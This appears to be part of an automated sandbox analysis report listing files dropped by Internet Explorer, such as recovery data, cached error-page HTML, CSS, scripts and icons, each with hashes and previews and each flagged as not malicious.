                            SHA-512:ED00DA0BCD83E1C860C96A8A3B3E34A62AA9FC90F8CE585D8A55BB0AD7AE1CDA3B13DCCE8329CC5ED164FB17646FCBC97534C1B339320073FEF2D6435FC358A7
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................n.S..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................(.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99D3DE79-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):2.2806376190599575
                            Encrypted:false
                            SSDEEP:24:r9GnGOj9lxY/EoACul/KmTcc3lnKzeD9n40o2OQnM:r9GnGOFY/EoA1l/TL3czeZ/OQ
                            MD5:697FA73D613A2A1F7EBA50C10453BEB8
                            SHA1:22747CA1F7282D25BC42087A05840D1FCBDDBF56
                            SHA-256:B68E0EC3E168EAD69ED604311648AA06D9F7BF13FE9B314FC2807286065E2F08
                            SHA-512:142A5CA93ACE24361234122C0AD84D8794EB9A67F70593A8DCC4745DD739C652FF00CDB9239199873A5099FAAA426AE3E668981F8699B5980390BC2C2C2E0E1A
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................0..`..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99D3DE7B-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):5632
                            Entropy (8bit):2.5653115715926136
                            Encrypted:false
                            SSDEEP:24:rWG0Gy9lKmRR0WCbicJSZcwKH5Al5AV1Rjsg9lgymRR0WnpJSZcwKH5Al5AV1Rj:rWG0GXmRRrSSS5ioRGymRRrnXSS5ioR
                            MD5:449612275D3C103729C78C488BB82A07
                            SHA1:CB946834762105833A7C70098072862D5511AEDD
                            SHA-256:5603B72BE3BC16442D15850AD2E4F880DF86F03EADFD9584E4A992B9FF85056F
                            SHA-512:04FD19EBA9457C6E0454D89E622109C19D02E5AB6792A75AE224D2A83E07AA6F8AD314D85F8C98BC1E8908074D6F812E1617CC65C1F62A3E0101536087107BBD
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................`.Mc..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................D.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99D3DE7D-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):2.6206728091071616
                            Encrypted:false
                            SSDEEP:24:rXGAGe9lKm/i7sPmbBkL+vrnlPzcDcRNqS9lx/i7sPmbB1CrnlPzcDcRNq:rXGAG5m/i7WAn51/i7Wvn5
                            MD5:2B9710B0A486CA786D6FAB291913FB5C
                            SHA1:69D813DD3F2ECFF7FE587B17B51D1437AED73AAF
                            SHA-256:68C49D52C2C927828BB5EBDD442E7136EC344117E6BD3B54B19C2EB802782B25
                            SHA-512:673AAA40D85A76853A4D867912EF3EA1B989D8016B0EA8D5D0557F843277D9CFE6BB54BBB91AAC9FBCBE47BE65AFB9B541ED756C0A593414E2F06FFBC48EA524
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................sc..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8....................................................... .......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99D3DE7F-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):2.702352020421559
                            Encrypted:false
                            SSDEEP:48:r6GVG+Xm3EUjo/dHrPs6PAh3EUjo/dHrPWPA:tXm3EF/5PAh3EF/8PA
                            MD5:F013F872862665488B4447B9B5A35A35
                            SHA1:15E1AC112D6A79AB8D6D615DD738AF5A0242A98E
                            SHA-256:54D0126324CD5ACEDECF7363F1470DC236150462517D2E91F475E25D58F98549
                            SHA-512:40BF3AF6E5F9D25EA8825D60D7707721A383E7F6E1F5330A3E4992F408DD9CCFEE05E8A3CE67BDBBC3A310FE343902931B29E060B3D66EBA9ED44A5D5A74538D
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................(.c..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................T.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{AAFB84CF-73DB-11EC-90E5-ECF4BB2D2496}.dat
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):2.2871885707378077
                            Encrypted:false
                            SSDEEP:24:rBGL1GOj9lxfX9LMXKYMOTFpZXIxSPE8pEDIq:rBG5GOFftLb7Op2xScH
                            MD5:47C8C5B156DF8E3BC8BAA6059AB85094
                            SHA1:44684CE9F28F111D864EFF2F90A6EB53E6AF27BB
                            SHA-256:22653866B328566BEAA73FE34F5D2BBC678268DFEAF37828E8DDBEA62ECA8368
                            SHA-512:D5B0D9DEC7590FFFA6F38F46D0DCB5636D8EC4FA5B3DAB51AE5457A63730F922A4A4517CB983C69C568D221708F8921874155EFEE5F5076257807E86853FFE37
                            Malicious:false
                            Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y............................................................................................o..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\NewErrorPageTemplate[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1612
                            Entropy (8bit):4.869554560514657
                            Encrypted:false
                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                            MD5:DFEABDE84792228093A5A270352395B6
                            SHA1:E41258C9576721025926326F76063C2305586F76
                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                            Malicious:false
                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\NewErrorPageTemplate[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1612
                            Entropy (8bit):4.869554560514657
                            Encrypted:false
                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                            MD5:DFEABDE84792228093A5A270352395B6
                            SHA1:E41258C9576721025926326F76063C2305586F76
                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                            Malicious:false
                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dnserror[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):2997
                            Entropy (8bit):4.4885437940628465
                            Encrypted:false
                            SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                            MD5:2DC61EB461DA1436F5D22BCE51425660
                            SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                            SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                            SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                            Malicious:false
                            Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dnserror[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):2997
                            Entropy (8bit):4.4885437940628465
                            Encrypted:false
                            SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                            MD5:2DC61EB461DA1436F5D22BCE51425660
                            SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                            SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                            SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                            Malicious:false
                            Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\down[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                            Category:dropped
                            Size (bytes):748
                            Entropy (8bit):7.249606135668305
                            Encrypted:false
                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                            MD5:C4F558C4C8B56858F15C09037CD6625A
                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                            Malicious:false
                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\down[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                            Category:dropped
                            Size (bytes):748
                            Entropy (8bit):7.249606135668305
                            Encrypted:false
                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                            MD5:C4F558C4C8B56858F15C09037CD6625A
                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                            Malicious:false
                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\errorPageStrings[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4720
                            Entropy (8bit):5.164796203267696
                            Encrypted:false
                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                            Malicious:false
                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\errorPageStrings[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4720
                            Entropy (8bit):5.164796203267696
                            Encrypted:false
                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                            Malicious:false
                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\errorPageStrings[3]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4720
                            Entropy (8bit):5.164796203267696
                            Encrypted:false
                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                            Malicious:false
                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\httpErrorPagesScripts[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):12105
                            Entropy (8bit):5.451485481468043
                            Encrypted:false
                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                            MD5:9234071287E637F85D721463C488704C
                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                            Malicious:false
                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\httpErrorPagesScripts[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):12105
                            Entropy (8bit):5.451485481468043
                            Encrypted:false
                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                            MD5:9234071287E637F85D721463C488704C
                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                            Malicious:false
                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\NewErrorPageTemplate[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1612
                            Entropy (8bit):4.869554560514657
                            Encrypted:false
                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                            MD5:DFEABDE84792228093A5A270352395B6
                            SHA1:E41258C9576721025926326F76063C2305586F76
                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                            Malicious:false
                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\NewErrorPageTemplate[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1612
                            Entropy (8bit):4.869554560514657
                            Encrypted:false
                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                            MD5:DFEABDE84792228093A5A270352395B6
                            SHA1:E41258C9576721025926326F76063C2305586F76
                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                            Malicious:false
